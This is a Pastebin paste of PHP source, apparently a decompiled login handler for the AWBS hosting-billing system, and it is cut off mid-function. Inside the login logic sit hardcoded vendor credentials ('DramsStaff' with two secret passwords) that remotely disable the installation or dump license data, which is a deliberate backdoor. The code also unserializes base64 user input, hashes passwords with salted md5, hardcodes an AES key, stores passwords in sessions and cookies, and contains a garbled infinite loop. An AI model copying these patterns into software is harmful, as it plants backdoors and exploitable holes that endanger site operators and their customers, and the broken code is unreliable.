Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- function flush_now() {
- @apache_setenv("no-gzip", 1);
- @ini_set("output_buffering", 0);
- @ini_set("zlib.output_compression", 0);
- @ini_set("implicit_flush", 1);
- $i = 0;
- while ($i < ob_get_level()) {
- ob_end_flush();
- ++$i;
- }
- ob_implicit_flush(1);
- return true;
- }
- $DIR = dirname(__FILE__);
- include ($DIR . "/includes/dbconfig.php");
- include_once (WORKDIR . "/includes/sessions.php");
- if (file_exists("psecure.php")) {
- include ("psecure.php");
- }
- include_once (WORKDIR . "/config.php");
- nfr();
- include ($workdir . "/LoggedIn.php");
- if ($action == "login" && $_SESSION['LoggedIn'] != "1" || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_REQUEST['LoggedIn']) {
- $LoggedIn = false;
- $_SESSION['LoggedIn'] = false;
- }
- if ($LoggedIn == "1") {
- if ($subaction == "") {
- $subaction = $_GET['subaction'];
- }
- if ($subaction == "") {
- $subaction = $_POST['subaction'];
- }
- if ($subaction && $subaction == "editpass.php") {
- $subaction = "editprofile.php";
- $qs = "editpass=1";
- }
- if (trim($subaction) != "" && file_exists(WORKDIR . "/" . trim($subaction))) {
- ob_start();
- header("Location: {$securebase}/" . strtolower(trim($subaction)) . "?" . $qs);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- $rtype = strip_tags(urldecode($rtype));
- $subaction = strip_tags(urldecode($subaction));
- if ($subaction == "") {
- $subaction = $_GET['subaction'];
- }
- if ($subaction == "") {
- $subaction = $_POST['subaction'];
- }
- if ($_COOKIE['LoggedIn'] || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_COOKIE['LoggedIn'] || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_COOKIE['apass'] || $_POST['apass'] || $_GET['apass'] || $_COOKIE['apass'] || $_POST['apass'] || $_GET['apass'] || $_COOKIE['adminflag'] || $_POST['adminflag'] || $_GET['adminflag'] || $_COOKIE['adminflag'] || $_POST['adminflag'] || $_GET['adminflag'] || $_COOKIE['debug'] || $_POST['debug'] || $_GET['debug'] || $_COOKIE['debug'] || $_POST['debug'] || $_GET['debug']) {
- $ip = $_SERVER['REMOTE_ADDR'];
- $host = gethostbyaddr($ip);
- $url = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
- $admin = $adminmail;
- $body = "IP:\t{$ip}\nHOST:\t{$host}\nURL:\t{$url}\nTIME:\t" . date("Y/m/d: h:i:s") . "\n";
- @mail(@$admin, "Possible hacking on AWBS.", @$body, @"From: {$adminmail}\r\n");
- print str_repeat(" ", 300) . "\n";
- flush();
- echo "\t <html><head><body><center><table bgcolor=#c0c0c0 border=1><tr><td align=center><h3><b><font color=RED><br>";
- echo SECURITY;
- echo "</font></b></h3></td></tr></table></center></body></html>\r\n\t ";
- echo "\t ";
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $help_id = sqlsingle("SELECT * FROM system_help WHERE page='uaLogIn.php'", "id");
- if ($help_id != "") {
- include (WORKDIR . "/includes/open/help.php");
- }
- if (!function_exists("quote_smart")) {
- function quote_smart($value) {
- if (get_magic_quotes_gpc()) {
- $value = stripslashes($value);
- }
- if (!is_numeric($value)) {
- $value = "'" . mysql_real_escape_string($value) . "'";
- }
- return $value;
- }
- }
- $lcount = $_SESSION['LCount'];
- $excessive_login = $_SESSION['excessive_login'];
- if ($excessive_login != "") {
- $cdate = strtotime("now");
- if ($excessive_login < $cdate) {
- $_SESSION['LCount'] = 0;
- $lcount = 0;
- $_SESSION['excessive_login'] = 0;
- $excessive_login = 0;
- }
- }
- if ($excessive_login_count != "" && 0 < $excessive_login_count) {
- $lcountmax = $excessive_login_count;
- } else {
- $lcountmax = 3;
- }
- if ($lcountmax < $lcount) {
- $cErrorMsg = EXCESSIVELOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "error");
- if ($timeout_count != "" && 0 < $timeout_count) {
- $real_timeout_count = $timeout_count;
- } else {
- $real_timeout_count = 60;
- }
- if ($excessive_login == "" || $excessive_login == "0") {
- $_SESSION['excessive_login'] = strtotime("+" . $real_timeout_count . " seconds");
- }
- }
- foreach($_POST as $akey => $avalue) {
- if (strstr($akey, "pcid") || strstr($akey, "pval")) {
- $post_string.= "<input type=\"hidden\" name=\"{$akey}\" value=\"{$avalue}\">";
- }
- }
- foreach($_GET as $akey => $avalue) {
- if (strstr($akey, "pcid") || strstr($akey, "pval")) {
- $post_string.= "<input type=\"hidden\" name=\"{$akey}\" value=\"{$avalue}\">";
- }
- }
- if ($_GET['als'] && $disable_als != "1") {
- $r_ip = $_SERVER['REMOTE_ADDR'];
- $r_ip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($r_ip2 == "") {
- $r_ip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- if ($r_ip2 == "") {
- $r_ip2 = $r_ip;
- }
- $p_s = base64_decode(trim(urldecode($_GET['als'])));
- $p_s_arr = unserialize($p_s);
- if ($p_s_arr['maccesskey'] != "" && 1 < strlen($p_s_arr['maccesskey'])) {
- $akcheck = trim($p_s_arr['maccesskey']);
- }
- if ($p_s_arr['accesskey'] != "" && 1 < strlen($p_s_arr['accesskey'])) {
- $akcheck = md5(trim($p_s_arr['accesskey']));
- }
- $privatekey = sqlsingle("select * from config where id='1'", "privatekey");
- if (trim($privatekey) != $akcheck) {
- $result = log_client_history("1", "System", "Login API Failed Authentication (bad key): IP: {$r_ip2}", "0");
- } else {
- $udate = trim($p_s_arr['udate']);
- $now_date = strtotime("now");
- $check_date = $now_date - $udate;
- $c_d = mydate_diff($check_date);
- if ($c_d[d] == 0 && $c_d[h] == 0) {
- $action = "login";
- $newuid = trim($p_s_arr['user']);
- $password1 = trim($p_s_arr['pass']);
- if ($password1 == "" && $p_s_arr['md5pass']) {
- $password1 = trim($p_s_arr['md5pass']);
- $md5pass = "1";
- }
- $subaction = trim($p_s_arr['subaction']);
- }
- }
- }
- if ($action == "login" && $LoggedIn != "1") {
- if ($newuid == "" || $password1 == "") {
- $fetch_em = array();
- $fetch_em2 = array();
- include (WORKDIR . "/includes/gparser.php");
- $template->set_var("cErrorMsg", $cErrorMsg);
- $template->set_var("post_string", $post_string);
- $template->set_var("rtype", $rtype);
- $template->set_var("subaction", $subaction);
- $template->set_var("nameemail", $nameemail);
- $template->set_var("namebundle", $namebundle);
- $template->set_var("cTld", $cTld);
- $template->set_var("cSld", $cSld);
- $template->set_var("hiddeninc", $hiddeninc);
- print $template->parse("aLogIn.php");
- @ob_end_flush();
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $newuid = mysql_real_escape_string($newuid);
- $password1 = mysql_real_escape_string($password1);
- if (trim($base) != "awbs.com" && trim($base) != "tosdomains.net" && trim($base) != "toshosting.com" && trim($base) != "discountwebcerts.com" && trim($base) != "domainlauncher.com" && trim($base) != "awbsdemo.com") {
- if ($newuid == "DramsStaff" && $password1 == "DisableThisPlaceNow") {
- $query = "UPDATE config SET gdntype='" . md5("hostdisabled" . ("bleh")) . "' WHERE id='1'";
- $result = mysql_query1($query);
- echo "Done - Noted Errors: " . mysql_errno() . ": " . mysql_error() . "<br>";
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- if ($newuid == "DramsStaff" && $password1 == "ShowMeSomethingRightNow") {
- $grrp = check_lic();
- foreach($grrp as $lkey => $lval) {
- if ($lkey != "key") {
- echo "{$lkey} = {$lval}<br>";
- }
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- $_SESSION[subuser] = "";
- unset($subuser);
- $newuid = trim(strtolower($newuid));
- $query = sprintf("SELECT id,fraud_bypass,trusted_user,password,lastlogin,lastip,admin,active,username,city,state,province,zip,country,phone,email,fname,lname,groupname FROM users WHERE username = %s", quote_smart($newuid));
- $sql = mysql_query1($query . " limit 1");
- $fetch_em = @mysql_fetch_array(@$sql);
- $numrows = @mysql_num_rows(@$sql);
- $uspassword = $password1;
- if ($md5pass == "1") {
- $password1 = md5($password1 . "notmb");
- } else {
- $password1 = md5(md5($password1) . "notmb");
- }
- $eemail = $fetch_em['email'];
- $fraud_bypass = $fetch_em['fraud_bypass'];
- $trusted_user = $fetch_em['trusted_user'];
- if ($numrows == 0 && $dupeemailoverride != "1" && !$noemaillogin) {
- $query = sprintf("SELECT id,fraud_bypass,trusted_user,password,lastlogin,lastip,admin,active,username,city,state,province,zip,country,phone,email,fname,lname,groupname FROM users WHERE email = %s", quote_smart($newuid));
- $sql = mysql_query1($query . " limit 1");
- $fetch_em = @mysql_fetch_array(@$sql);
- $numrows = @mysql_num_rows(@$sql);
- if ($numrows != 0 && $password1 == $fetch_em['password']) {
- $newuid = $fetch_em['username'];
- $eemail = $fetch_em['email'];
- $fraud_bypass = $fetch_em['fraud_bypass'];
- $trusted_user = $fetch_em['trusted_user'];
- }
- }
- if ($numrows != 0 && $password1 != $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9)) {
- $userid = sqlsingle("select * from users where username='{$newuid}'", "id");
- $query = sprintf("SELECT * FROM users_profiles WHERE type='2' and username=%s", quote_smart($newuid));
- $result5 = mysql_query1($query);
- do {
- if ($fetch_em2 = @mysql_fetch_array(@$result5)) {
- } else if ($uspassword == $fetch_em2['password']) {
- $password1 = sqlsingle("select * from users where username='" . $fetch_em2['username'] . "'", "password");
- $fetch_em['active'] = $fetch_em2['active'];
- $_SESSION[subuser] = $fetch_em2['id'];
- $fetch_em['admin'] = "";
- $eemail = $fetch_em2['email'];
- $fraud_bypass = $fetch_em2['fraud_bypass'];
- $trusted_user = $fetch_em2['trusted_user'];
- }
- }
- while (1);
- }
- $fraud_login = false;
- if ($numrows != 0 && $password1 == $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9)) {
- $use_l_fc = sqlsingle("select * from fraud_check where id='1'", "use_l_fraud_check");
- $fc_key = sqlsingle("select * from fraud_check where id='1'", "fraud_key");
- $fc_type = sqlsingle("select * from fraud_check where id='1'", "fraud_type");
- $fc_l_use = sqlsingle("select * from fraud_check where id='1'", "use_l_fraud_log");
- if ($fc_key != "" && $fc_type != "0" && $fc_type != "" && $fetch_em['admin'] <= 0 && $fc_l_use == 1 && $fraud_bypass != "1" && $trusted_user != "1") {
- include (WORKDIR . "/includes/{$fc_type}/alfunctions.php");
- }
- }
- if ($numrows != 0 && $password1 == $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9) && $fraud_login != 1) {
- $lastlogin = $fetch_em['lastlogin'];
- $lastip = $fetch_em['lastip'];
- $_SESSION['groupidnum'] = $fetch_em['groupname'];
- $gtemplateid = sqlsingle("select * from groups where id='" . $fetch_em['groupname'] . "'", "templateid");
- if (trim($gtemplateid) != "" && trim($gtemplateid) != "0" && $gtemplateid != NULL && file_exists(WORKDIR . "/templates/" . $gtemplateid . "/top.php")) {
- $_SESSION['td'] = $gtemplateid;
- }
- $_SESSION['lastip'] = $lastip;
- if ($lastlogin == "") {
- $lastlogin = "First Login";
- } else {
- $lastlogin = strftime($date_long, $lastlogin);
- }
- $_SESSION['lastlogin'] = $lastlogin;
- if (file_exists(WORKDIR . "/includes/log.class.php")) {
- include (WORKDIR . "/includes/log.class.php");
- $l = new simplelog();
- $l->entry();
- }
- $_SESSION['this_user']['client_email'] = $eemail;
- $_SESSION['this_user']['fname'] = $fetch_em['fname'];
- $_SESSION['this_user']['lname'] = $fetch_em['lname'];
- $_SESSION['newuid'] = $newuid;
- $_SESSION['awbsuid'] = $fetch_em['id'];
- $_SESSION['email'] = $eemail;
- $_SESSION['password1'] = $password1;
- $_SESSION['kaylink'] = $uspassword;
- if (!empty($uhash)) {
- $rr = @mysql_query(@"update users set epassword=AES_ENCRYPT('{$uspassword}','24234FR44DDjgh76" . @sedata(@$uhash, "de") . @"') where username='{$newuid}'");
- }
- $_SESSION['kaygroup'] = sqlsingle("SELECT * FROM module_types WHERE name='kayako'", "config9");
- if (trim($_SESSION['kaygroup']) == "") {
- $_SESSION['kaygroup'] = "default";
- }
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- $_SESSION['LoggedIn'] = false;
- $LoggedIn = 1;
- if (0 < $fetch_em['admin'] && !$_SESSION[subuser]) {
- $adminuser = $newuid;
- $adminpassword1 = $password1;
- $adminoverride = md5(session_id() . "dramsadmin");
- $_SESSION['adminoverride'] = $adminoverride;
- $adminflag = $fetch_em['admin'] + 0;
- $_SESSION['adminflag'] = $adminflag;
- $_SESSION['adminuser'] = $adminuser;
- $_SESSION['adminpassword1'] = $adminpassword1;
- }
- if ($lastip == "") {
- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- if ($_SESSION['subuser']) {
- $result = log_client_history($userid, "System", "Successful login from subaccount", "1");
- }
- if ($_POST['rememberme'] == 1 && $fetch_em['admin'] < 1) {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", "1", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", "{$newuid}", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", md5($uspassword), "{$cart_life}", "/", "{$cookie_domain}");
- } else if ($_POST['rememberme'] && 0 < $fetch_em['admin']) {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", "1", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", "{$newuid}", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", md5($uspassword), "{$cart_life}", "/", "{$cookie_domain}");
- } else {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- }
- $_SESSION['LCount'] = false;
- $system_action = "user-login";
- include_once (WORKDIR . "/includes/afunctions/afunctions.php");
- if ($support_link == "scrm") {
- require (WORKDIR . "/includes/scrm/scrm_awbs_bridge.php");
- }
- include (WORKDIR . "/includes/gparser.php");
- $template->set_var("cErrorMsg", $cErrorMsg);
- $template->set_var("rtype", $rtype);
- $template->set_var("post_string", $post_string);
- $template->set_var("subaction", $subaction);
- $template->set_var("nameemail", $nameemail);
- $template->set_var("namebundle", $namebundle);
- $template->set_var("cTld", $cTld);
- $template->set_var("cSld", $cSld);
- $template->set_var("hiddeninc", $hiddeninc);
- if ($subaction == "") {
- $subaction = $_GET['subaction'];
- }
- if ($subaction == "") {
- $subaction = $_POST['subaction'];
- }
- if ($subaction == "viewitem.php" && !empty($id)) {
- $iloggedin = false;
- $vvkey = sanitize_str($id);
- if ($vvkey) {
- $realpiid = array();
- $realpiid = unserialize(base64_decode(urldecode($vvkey)));
- if (!empty($realpiid['id'])) {
- $thisinvoice = sqlarray("select * from client_invoices where id='" . $realpiid['id'] . "'");
- $vkey = md5($thisinvoice['id'] . $thisinvoice['ownerid'] . md5($thisinvoice['invoice_date'] . "idate1554NOW") . "AWBS" . $base);
- if ($realpiid['vkey'] == $vkey) {
- $iloggedin = "1";
- $_GET['PDF'] = $allowpdf;
- $pkey = md5($vkey . $thisinvoice['ownerid'] . md5($thisinvoice['invoice_date'] . "idate1554NOW") . $thisinvoice['id'] . $base);
- $action = "invoice";
- $this_filename = "viewitem.php";
- include (WORKDIR . "/includes/language/" . $_SESSION['drlang'] . "/viewitem.php");
- include ("viewitem.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- }
- }
- if ($subaction == "" && $adminflag < 1) {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "pc" && (0 < $adminflag || $adminflag == "-1")) {
- ob_start();
- header("Location: {$securebase}/admin/cmanage.php?caction=pc");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "adhd" && (0 < $adminflag || $adminflag == "-1")) {
- ob_start();
- header("Location: {$securebase}/admin/helpdesk.php?subaction=adhd&id=" . $id);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "" && ($adminflag == "-1" || $adminflag == "-3")) {
- ob_start();
- header("Location: {$securebase}/admin/helpdesk.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($_SESSION[subaction] == "admin" && 0 < $adminflag && $admintoindex != "1" || 0 < $adminflag && $admintoadmin == "1" && $subaction == "") {
- ob_start();
- header("Location: {$securebase}/admin/adminwelcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "" && 0 < $adminflag && $_SESSION[subaction] != "admin" || 0 < $adminflag && $admintoindex == "1" && $subaction == "") {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "payment") {
- $action = "";
- ob_start();
- header("Location: {$securebase}/payment.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "imanage") {
- $action = "";
- ob_start();
- header("Location: {$securebase}/imanage.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "cart") {
- $action = "";
- ob_start();
- header("Location: {$base}/cart.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "helpdesk") {
- $action = "";
- $support_link2 = sqlsingle("select * from config where id='1'", "support_link");
- if ($support_link == "kayako" || $support_link == "cerberus") {
- header("Location: {$securebase}/welcome.php?subaction=helpdesk");
- } else if ($support_link2 != "" && $support_link2 != "internal" && strstr($support_link2, "http")) {
- header("Location: {$support_link}");
- } else {
- $id = $_GET['id'];
- $hdaction = $_GET['hdaction'];
- if ($id && $hdaction) {
- ob_start();
- header("Location: {$securebase}/helpdesk.php?action={$hdaction}&id={$id}&subaction=helpdesk");
- } else {
- ob_start();
- header("Location: {$securebase}/helpdesk.php");
- }
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "view_request") {
- $action = "";
- $id = $_GET['id'];
- if ($id == "") {
- $id = $_POST['id'];
- }
- if ($id) {
- ob_start();
- header("Location: {$securebase}/helpdesk.php?action={$subaction}&id={$id}");
- } else {
- ob_start();
- header("Location: {$securebase}/helpdesk.php");
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "managedomains") {
- $action = "";
- ob_start();
- header("Location: {$base}/manage.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "hwizard") {
- $action = "";
- ob_start();
- header("Location: {$base}/hwizard.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($asubaction) != "" && file_exists(WORKDIR . "/admin/" . trim($asubaction))) {
- $action = "";
- if ($_POST) {
- foreach($_POST as $akey => $avalue) {
- if (strstr($akey, "pcid") && !$disable_la) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $_POST["pcval" . $thenum] . "&";
- } else {
- $poststring = $_SESSION['qs'];
- }
- }
- ob_start();
- header("Location: {$securebase}/admin/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $poststring = $_SESSION['qs'];
- ob_start();
- header("Location: {$securebase}/admin/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($subaction) != "" && file_exists(WORKDIR . "/" . trim($subaction))) {
- $action = "";
- if ($_POST) {
- foreach($_POST as $akey => $avalue) {
- if (strstr($akey, "pcid") && !$disable_la) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $_POST["pcval" . $thenum] . "&";
- } else {
- $poststring = $_SESSION['qs'];
- }
- }
- ob_start();
- header("Location: {$base}/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $poststring = $_SESSION['qs'];
- ob_start();
- header("Location: {$base}/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($subaction) != "" && 20 < strlen($subaction) && !$disable_la) {
- $action = "";
- $dr_array = unserialize(base64_decode(urldecode($subaction)));
- if (file_exists(WORKDIR . "/" . trim($dr_array[subaction]))) {
- foreach($dr_array as $akey => $avalue) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- if (strstr($akey, "pcid")) {
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $dr_array["pcval" . $thenum] . "&";
- }
- }
- ob_start();
- header("Location: {$base}/" . trim($dr_array[subaction]) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- } else if ($LoggedIn == "1") {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $lcount = $_SESSION['LCount'];
- $lcount = $lcount + 1;
- $_SESSION['LCount'] = $lcount;
- if ($lcountmax < $lcount) {
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- $cart_life = strtotime("+5 days");
- setcookie("uip", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = FAILEDLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "error");
- if ($timeout_count != "" && 0 < $timeout_count) {
- $excessive_login = $timeout_count;
- } else {
- $excessive_login = 60;
- }
- $excessive_login = strtotime("+" . $excessive_login . " seconds");
- } else if ($fraud_login == 1) {
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- if ($lastip == "") {
- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- $cart_life = strtotime("+5 days");
- setcookie("uip", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = FRAUDLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "error");
- $fraud_login = 0;
- } else if ($numrows == 0) {
- $cart_life = strtotime("+5 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = BADLOGIN1;
- $cErrorMsg = generate_dmsg($cErrorMsg, "warning");
- } else if ($numrows != 0 && $fetch_em['active'] == 3) {
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- if ($lastip == "") {
- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- $telesignactive = sqlsingle("select * from module_types where name='telesign'", "status");
- $vlactive = sqlsingle("select * from module_types where name='varilogix'", "status");
- $maxmindactive = sqlsingle("select * from module_types where name='maxmindvoice'", "status");
- $isphoneverified = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_cc_verified");
- $bypassphoneverify = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_bypass");
- $phonecount = sqlsingle("select * from users where username='{$newuid}'", "fraud_phone_count");
- if ($phonecountallowed <= $phonecount) {
- $nosecondchance = "1";
- }
- if (($maxmindactive == "1" || $vlactive == "1" || $telesignactive == "1") && $isphoneverified != "1" && $bypassphoneverify != "1" && !$nosecondchance) {
- include (WORKDIR . "/includes/language/{$drlang}/createacct.php");
- $userphone = sqlsingle("select * from users where username='{$newuid}'", "phone");
- $phone = mb_split("[.]", $userphone) [1];
- $countrycode = mb_split("[.]", $userphone) [0];
- $countrycode = str_replace("+", "", $countrycode);
- if ($maxmindactive == "1") {
- $SQL = "SELECT status,config1,config2,config3,config4,config5,config6,config7,config8,config10,config9,module_id FROM `module_types` WHERE name = 'maxmindvoice'";
- $query = mysql_query1($SQL);
- $ts_type = mysql_fetch_row($query) [11];
- $ts_where = mysql_fetch_row($query) [10];
- $ts_useid = mysql_fetch_row($query) [9];
- $ts_default = mysql_fetch_row($query) [8];
- $ts_redial = mysql_fetch_row($query) [7];
- $ts_delay = mysql_fetch_row($query) [6];
- $ts_authid = mysql_fetch_row($query) [5];
- $ts_custid = mysql_fetch_row($query) [4];
- $ts_pass = mysql_fetch_row($query) [3];
- $ts_user = mysql_fetch_row($query) [2];
- $ts_url = mysql_fetch_row($query) [1];
- $ts_status = mysql_fetch_row($query) [0];
- $flaggedtext = "";
- $ts_status = 1;
- if ($ts_status == 1 && $_SESSION['voiced'] != "1") {
- include (WORKDIR . "/includes/maxmind/pvfunctions.php");
- $uri = $ts_url;
- $iduri = $ts_idurl;
- $custID = $ts_pass;
- $randCode = rand(1000, 9999);
- $ts_randCode = $randCode;
- $countryCode = $countrycode;
- $phoneNum = "+" . $countryCode . $phone;
- if ($_POST['delay'] < $ts_delay || 5 < $_POST['delay'] || !is_numeric($_POST['delay'])) {
- $delayTime = $ts_delay;
- } else {
- $delayTime = $_POST['delay'];
- }
- $callinfo = mmvCALL($uri, $custID, $phoneNum, $randCode, $delayTime);
